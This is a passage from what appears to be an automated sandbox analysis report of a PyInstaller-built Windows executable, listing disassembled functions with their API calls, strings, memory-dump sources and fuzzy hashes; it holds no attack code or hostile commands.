                                                              • CreateDirectoryW.KERNEL32(00000000,?,00007FF623F7352C,?,00000000,00007FF623F73F1B), ref: 00007FF623F77F32
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CreateDirectory
                                                              • String ID: %.*s$%s%c$\
                                                              • API String ID: 4241100979-1685191245
                                                              • Opcode ID: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                              • Instruction ID: 0e863aa9f5a5636fa9361145789b993a6251270fdf9eef3d74353bd50db5fb85
                                                              • Opcode Fuzzy Hash: a1c59376f93c8b4c6db0aee125681cb96c2ab9e1787ffa8cf6eb7b68f1c1c36c
                                                              • Instruction Fuzzy Hash: 7431C321629AC145FE218B20FC127FA6354EB84BE4F404271EA6D9B7C9EF2CD7058741
                                                              Function 00007FFE1333A714 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: NameName::
                                                              • String ID: %lf
                                                              • API String ID: 1333004437-2891890143
                                                              • Opcode ID: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                              • Instruction ID: 545d51dab23dc4257e8cb222550d97a3e74e47bdcbb4b1b785c797f4e48910e3
                                                              • Opcode Fuzzy Hash: f37b8968dc856f8c22d72c120ca4476383f363961e161f929d9d255907aecf6d
                                                              • Instruction Fuzzy Hash: BC31A33290CE8189FA70CB26A850279A760FBA5BA4F44C1B1E9BE67675DF3CD5428704
                                                              Function 00007FF623F72810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                              • API String ID: 2030045667-255084403
                                                              • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                              • Instruction ID: 7d7e727b8e945b7f3026d7fded181585a66cd9559cb8f2b88501fe742412f3bd
                                                              • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                              • Instruction Fuzzy Hash: C221BC62B08B4192EB209B15F8427AA63A0EB88780F404136EE8DA7659EF3CD749C741
                                                              Function 00007FFDFAFA1C7B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
                                                              • API String ID: 2248877218-3633731555
                                                              • Opcode ID: 08b153525b22f68bce6c0ce52d6482cbcd7b48ba9f1bbef09f70e45993973d2a
                                                              • Instruction ID: 3e1bacbdb3d5835225a5b57bc623d4eee2da277bdc0b34905a254d517855fce4
                                                              • Opcode Fuzzy Hash: 08b153525b22f68bce6c0ce52d6482cbcd7b48ba9f1bbef09f70e45993973d2a
                                                              • Instruction Fuzzy Hash: CD218621B09647C1EB10DB55E4609EA6360FF847A4F404135EA9C4B7EDEF7DE144C700
                                                              Function 00007FFDFAFA139D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLastsocket
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                              • API String ID: 1120909799-2051290508
                                                              • Opcode ID: e6e0678db33773633ffedb91ac649e33e06e4e0a3b3b72e71866550694f6694c
                                                              • Instruction ID: 551081d24cfdde0a571ea1299911b08a47a35bb1fe6119cb0721be60cded508c
                                                              • Opcode Fuzzy Hash: e6e0678db33773633ffedb91ac649e33e06e4e0a3b3b72e71866550694f6694c
                                                              • Instruction Fuzzy Hash: 1201A131B1854386E3109B11E4219AA6225FF84764F508235F67C4BAE9CF3DD901C744
                                                              Function 00007FFE13332400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FFE13336710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1333239E), ref: 00007FFE1333671E
                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1333243E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abortterminate
                                                              • String ID: MOC$RCC$csm
                                                              • API String ID: 661698970-2671469338
                                                              • Opcode ID: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                              • Instruction ID: bcb2bb695d15c0bc4ed2c690fdbf6aa7050d35e2c72a685b0af841ced28835a3
                                                              • Opcode Fuzzy Hash: b838753ef247b2fc749e3877e0128dea9035de62b0ba29f15289213c97603889
                                                              • Instruction Fuzzy Hash: 38F0AF36908A468DEB505F23E180068B260FB68F60F08D0B1E76C53272CF3CD4D0D605
                                                              Function 00007FFE1333E9E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __C_specific_handler.LIBVCRUNTIME ref: 00007FFE1333E9F0
                                                                • Part of subcall function 00007FFE1333EC30: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1333ECF0
                                                                • Part of subcall function 00007FFE1333EC30: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FFE1333E9F5), ref: 00007FFE1333ED3F
                                                                • Part of subcall function 00007FFE13336710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE1333239E), ref: 00007FFE1333671E
                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1333EA1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: C_specific_handlerCurrentImageNonwritableUnwindabortterminate
                                                              • String ID: csm$f
                                                              • API String ID: 2451123448-629598281
                                                              • Opcode ID: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                              • Instruction ID: 8885ae8dd6ed16f022a1301dc7bff458cdc353592f960dbb4d4000434bb76696
                                                              • Opcode Fuzzy Hash: c9fb23446a5b638453e0304dd207887769bfaeb8010eb75ee95ffcfd07f137de
                                                              • Instruction Fuzzy Hash: AFE06536D18A4289E7206B63B18113DA6A4BF35F74F14C0B5DA6C27666CE3CE4A08619
                                                              Function 00007FF623F8C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                              • Instruction ID: e917b9690f21b07b2a036c617f1d9907808472a5db55dfe2908e61a70d5635a8
                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                              • Instruction Fuzzy Hash: C7D12572B09A4189EB14CF66E8412AC7BB1FB54BD8B4042B5DE4DE7B99DF38D606C301
                                                              Function 00007FF623F8CF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF623F8CF4B), ref: 00007FF623F8D07C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF623F8CF4B), ref: 00007FF623F8D107
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                              • Instruction ID: 3f28fdcec8c30cd6d056f420eea1b65b8bf0c9dd5af5f16432851651c741ea95
                                                              • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                              • Instruction Fuzzy Hash: 9191C623E1865185FF689F66AC4227D2BA1AF44BC8F144176EE0EB7694CF38D642C702
                                                              Function 00007FFE13339CC0 Relevance: 6.2, APIs: 4, Instructions: 193COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID:
                                                              • API String ID: 2943138195-0
                                                              • Opcode ID: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                              • Instruction ID: d771f0bddf902bd6542c3f28653309153be1649d6e2867dc80590187293f8ece
                                                              • Opcode Fuzzy Hash: f50f9f5b0f4c072e52125a456639a7d4e2bd829a5a5137cb56b4f6bb80237050
                                                              • Instruction Fuzzy Hash: 5A916C22E08E96CDF7118B62D8413BC67A0BB24B68F5081B5DA6D376B5DF7CA845C344
                                                              Function 00007FFDFAFA2DF1 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 173COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Operation not permitted$unknown
                                                              • API String ID: 1452528299-31098287
                                                              • Opcode ID: 4f38512cd59b4e9079a15f4968c6b5057c5ac8c27ef1edf97390e5a951f79121
                                                              • Instruction ID: 09e04e3813a6238ca0912118fc1d0e14baa98d7976fa661f2bdd4e5c7d4058e2
                                                              • Opcode Fuzzy Hash: 4f38512cd59b4e9079a15f4968c6b5057c5ac8c27ef1edf97390e5a951f79121
                                                              • Instruction Fuzzy Hash: CB810DA5F0A64785EB20AB11D860BBA6390FF857A8F584535D96E8B3EDDF3CE440C700
                                                              Function 00007FF623F8F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                              • Instruction ID: c09000c481b139f624ce964bd6eae216fc147529ed6445a233890586446d62ff
                                                              • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                              • Instruction Fuzzy Hash: B251E672F043128BEF18CF69BD566BC2761AB443A8F514275DD1EA3BE5DF38A6028701
                                                              Function 00007FFE1333A44C Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+$NameName::
                                                              • String ID:
                                                              • API String ID: 168861036-0
                                                              • Opcode ID: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                              • Instruction ID: 74ba98e67f9684f66e44292dce398c888505683e62661af497b5faaa43cb7ff6
                                                              • Opcode Fuzzy Hash: fdc850366a52cc8509fdc883a27d076c67a20e363f2b2ed3a2a440fa302089d7
                                                              • Instruction Fuzzy Hash: 32514672E18A568CF7118F62E8403B877A0BB64B68F548071DA6E676B5DF3DE442C348
                                                              Function 00007FF623F8577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                              • Instruction ID: 97e9f6225ebcfaf71064f587e13e4022248f075250c80b74b74a3a4308da7fe3
                                                              • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                              • Instruction Fuzzy Hash: 1D518222E086458BFF14CF72E9523BD37A2AB48B98F148575DE0DA7689DF38D641C702
                                                              Function 00007FFE1333C87C Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID:
                                                              • API String ID: 2943138195-0
                                                              • Opcode ID: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                              • Instruction ID: d022a81da060eb2fd5931f49e93a8321cecf38f5c7513c522820b14dce462f42
                                                              • Opcode Fuzzy Hash: 010c9cc7b649f2daabbc83b7255f351f4a32df461fe661a6f710ba75eaae01a6
                                                              • Instruction Fuzzy Hash: CE417572A08B858DFB01CF66D8413ACB7B0FB68B68F548065DA9D6B769DF389481C314
                                                              Function 00007FF623F720C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction ID: 190ba110bade15a2c8ba021cda0a620b6aaf6efc90c09274e4fbb03aac14a1ba
                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction Fuzzy Hash: CF112921A1C14282FE548F69FD462B91292FB84780F448070DB495BB9ACF6DDA958202
                                                              Function 00007FF623F7D010 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
